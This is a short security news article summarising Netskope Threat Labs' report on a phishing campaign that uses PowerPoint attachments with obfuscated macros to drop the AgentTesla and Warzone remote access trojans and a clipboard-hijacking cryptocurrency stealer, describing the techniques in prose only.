Researchers from Netskope’s Threat Labs have documented a PowerPoint-based information-stealing campaign, that’s been in wild since late last year.
Threat actors here are seen dropping AgentTesla and Warzone RATs, the two powerful data-stealing trojans. Alongside, there’s a cryptocurrency stealer too that researchers have spotted. Thus, they now warn people to be vigilant in clicking and processing suspicious PowerPoint files.
PowerPoint Files Dropping RATs
A publication shared by Netskope’s Threat Labs has detailed a malicious campaign, that picked up pace in December 2021. As per their report, spam emails with PowerPoint files are being distributed in the wild, which come with remote access trojan (RAT) and legitimate cloud services.
In the first instance, there’s AgentTesla, a powerful RAT is being distributed through PowerPoint phishing attachments. This file contains an obfuscated macro that used a combination of PowerShell and MSHTA for execution.
There’s also a function to disable the Windows Defender, that comes along with AgentTesla. Further, there’s a scheduled task created by the VBS script, which runs every hour and fetches a cryptocurrency stealer from a Blogger URL.
In the second instance, there’s another RAT named Warzone is being delivered. While Netskope hasn’t shared many details about this, they said a dedicated cryptocurrency stealer too is involved in this campaign, which observes the clipboard data of the victim’s system, and replaces the cryptocurrency wallet address with something that of hacker’s, when detected.
The supported cryptocurrency wallets are Bitcoin, Ethereum, XMR, DOGE, and more. The researchers at Netskope have shared the complete list of IoCs, and also mentioned the wallets used by the actors on this GitHub page for awareness.
Threat actors are also seen using legitimate cloud services, from which they can host and draw their malicious payloads. This method is followed since it’s less likely to raise flags by the security systems.